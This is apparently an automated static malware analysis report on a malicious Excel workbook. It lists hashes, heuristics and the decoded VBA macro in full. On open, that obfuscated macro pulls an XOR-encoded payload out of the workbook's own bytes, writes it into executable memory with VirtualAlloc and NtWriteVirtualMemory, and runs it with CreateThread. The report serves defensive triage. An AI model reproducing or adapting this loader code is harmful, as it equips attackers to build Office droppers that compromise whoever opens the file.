Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fba322adda5003d0…

MALICIOUS

Office (OLE)

38.7 KB Created: 2017-07-27 14:08:21 Authoring application: Microsoft Excel First seen: 2017-08-08
MD5: fa4e549d8a713b64b650a0265fdbb738 SHA-1: 2323318eac74962883c211195ae6f4faf7e08e97 SHA-256: fba322adda5003d0c414bae83d43c5c9781b5164770551320d11ed0ddfaa40c1
78 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains both Excel 4.0 (XLM) and VBA macros, with the VBA macros referencing Win32 API functions like VirtualAlloc and CreateThread. This suggests the macro is designed to allocate memory and execute shellcode, likely a second-stage payload. The presence of both macro types and the API calls point towards a downloader or dropper functionality.

Heuristics 6

  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Public Sub Document_Open()
        oTVSpOqBmopNcGR
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
        Document_Open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 172 bytes
SHA-256: 63d3437f0ef9d6e6f7cafadd6a5473d8826a0decff0e7e519719b73893f4ae2d
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Makro
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4736 bytes
SHA-256: 3370d9f502661f379429f9a3b0fa0919b7ccd4bf634a30492dfc8fcd4b0ed494
Detection
ClamAV: No threats found
Obfuscation or payload: likely
35 of 70 identifiers look randomly generated (e.g. 'zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGD') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BuÇalışmaKitabı"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

#If VBA7 Then
Private Declare PtrSafe Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread" (ByVal ayZaHOWFHacx As Long, ByVal ZSAqEaJBJasBylEERPBzYDqQJdDvo As Long, ByVal NRITUajqoVwOqxGyiCsbPkAX As LongPtr, wBKGA As Long, ByVal nnVmBSFrDvBBGcj As Long, SklUbdmYCqL As Long) As LongPtr
Private Declare PtrSafe Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal lWDIRwzSTfKcWQWEYsJh As Long, ByVal dfSVTNyRzwxqi As LongPtr, ByVal zkPmmIruYEO As Long, ByVal HlGQxDWoh As Long) As LongPtr
Private Declare PtrSafe Function NtWriteVirtualMemory Lib "NTDLL" (ByVal LMYJbbtJmMNBxtigxzaIhnhKf As LongPtr, ByVal lIYUtUgJzcn As LongPtr, ByVal GqbosbufOmIrgxozIxF As String, ByVal DOPKKrsTvNT As LongPtr, ByRef SUSKHSVf As LongPtr) As LongPtr
#Else
Private Declare Function yzyJNyjBvkeFDlPGoJTVRjIAv Lib "kernel32" Alias "CreateThread"  (ByVal ayZaHOWFHacx As Long, ByVal ZSAqEaJBJasBylEERPBzYDqQJdDvo As Long, ByVal NRITUajqoVwOqxGyiCsbPkAX As Long, wBKGA As Long, ByVal nnVmBSFrDvBBGcj As Long, SklUbdmYCqL As Long) As Long
Private Declare Function vkaWKlhNTeWRNiTISHfF Lib "kernel32" Alias "VirtualAlloc" (ByVal lWDIRwzSTfKcWQWEYsJh As Long, ByVal dfSVTNyRzwxqi As Long, ByVal zkPmmIruYEO As Long, ByVal HlGQxDWoh As Long) As Long
Private Declare Function NtWriteVirtualMemory Lib "NTDLL" (ByVal LMYJbbtJmMNBxtigxzaIhnhKf As Long, ByVal lIYUtUgJzcn As Long, ByVal GqbosbufOmIrgxozIxF As String, ByVal DOPKKrsTvNT As Long, ByRef SUSKHSVf As Long) As Long
#End If

Const mnFuhDfKvQHgUisvxL = &H1000
Const sswxspBrjhMY = &H40

Public Sub oTVSpOqBmopNcGR()
    Dim TPLYmybAh() As Byte

    TPLYmybAh = dFBgqsXGxAtVKCECEoiJZUEu(ActiveWorkbook.FullName)
    Dim OhVBlZ As String
    OhVBlZ = StrConv(TPLYmybAh, 64)
    
    Dim dAuZnSnrpKXUGVyOXV
    dAuZnSnrpKXUGVyOXV = Split(OhVBlZ, "zUAUVUQXkyLFITwrcUnChzjUJeGacIospMjnNwGDYdlAZnpVYOzKQyJaKFkRnQVBktpWJiEFnJEdoJVwOKbnjECRdiChlOqhiJpFXtmPkTwgUFMaJOdDOHsGQyTBFwtytwVEuqzuyldphvXxvCyxLMtAqJOzALjNAXNyJhGtpIeCDdzvB")

    Dim ziiQRvKnZjFLdqlYgwiGWxGX As String
    Dim PjbgjZajqFy As String
    Dim JIPOuyFscUpOCTUykmzSeYmEO As String
    PjbgjZajqFy = StrConv(StrConv(dAuZnSnrpKXUGVyOXV(UBound(dAuZnSnrpKXUGVyOXV)), 64), 128)
    JIPOuyFscUpOCTUykmzSeYmEO = Mid$(PjbgjZajqFy, 3, Len(PjbgjZajqFy))

    ziiQRvKnZjFLdqlYgwiGWxGX = WJPyO("fdYWNGcvoKBZUNbqPj", JIPOuyFscUpOCTUykmzSeYmEO)
    
    #If VBA7 Then
        Dim GcpnLvPzvO As LongPtr
        Dim eIhjodoRfxikPQne As LongPtr
    #Else
        Dim GcpnLvPzvO As Long
        Dim eIhjodoRfxikPQne As Long
    #End If

    GcpnLvPzvO = vkaWKlhNTeWRNiTISHfF(0, Len(ziiQRvKnZjFLdqlYgwiGWxGX), mnFuhDfKvQHgUisvxL, sswxspBrjhMY)
    eIhjodoRfxikPQne = NtWriteVirtualMemory(-1, GcpnLvPzvO, ziiQRvKnZjFLdqlYgwiGWxGX, Len(ziiQRvKnZjFLdqlYgwiGWxGX), 0)
    eIhjodoRfxikPQne = yzyJNyjBvkeFDlPGoJTVRjIAv(0, 0, GcpnLvPzvO, 0, 0, 0)
End Sub

Public Function dFBgqsXGxAtVKCECEoiJZUEu(ByVal rsOpRbBlbNPigJQHeFQSdwTEdsjx As String) As Byte()
    Dim PjbgjZajqFy As Long
    Dim JIPOuyFscUpOCTUykmzSeYmEO() As Byte
    PjbgjZajqFy = FreeFile
    If LenB(Dir(rsOpRbBlbNPigJQHeFQSdwTEdsjx)) Then
        Open rsOpRbBlbNPigJQHeFQSdwTEdsjx For Binary Access Read As PjbgjZajqFy
        ReDim JIPOuyFscUpOCTUykmzSeYmEO(LOF(PjbgjZajqFy) - 1&) As Byte
        Get PjbgjZajqFy, , JIPOuyFscUpOCTUykmzSeYmEO
        Close PjbgjZajqFy
    Else
        Err.Raise 53
    End If
    dFBgqsXGxAtVKCECEoiJZUEu = JIPOuyFscUpOCTUykmzSeYmEO
    Erase JIPOuyFscUpOCTUykmzSeYmEO
End Function

Public Sub Document_Open()
    oTVSpOqBmopNcGR
End Sub

Sub Workbook_Open()
    Document_Open
End Sub

Public Function WJPyO(ratOeQJTEfkUUnEpeBYegFNLvkZsB As String, CEgpwCzgutDFoYOsKBxGFnzJTMn As String) As String
    Dim tTQrrIDGOFRbQYhEBAqPW As Long
    Dim AyUUqo As String
    Dim wvKoRNA As Integer, PoGKTwQZoQYni As Integer, a As Long

    For tTQrrIDGOFRbQYhEBAqPW = 1 To Len(CEgpwCzgutDFoYOsKBxGFnzJTMn)
        a = tTQrrIDGOFRbQYhEBAqPW Mod Len(ratOeQJTEfkUUnEpeBYegFNLvkZsB)
        If a = 0 Then a = Len(ratOeQJTEfkUUnEpeBYegFNLvkZsB)
        
        wvKoRNA = Asc(Mid$(CEgpwCzgutDFoYOsKBxGFnzJTMn, tTQrrIDGOFRbQYhEBAqPW, 1))
        PoGKTwQZoQYni = Asc(Mid$(ratOeQJTEfkUUnEpeBYegFNLvkZsB, a, 1))
        AyUUqo = AyUUqo + Chr(wvKoRNA Xor PoGKTwQZoQYni)
    Next tTQrrIDGOFRbQYhEBAqPW
    
   WJPyO = AyUUqo
End Function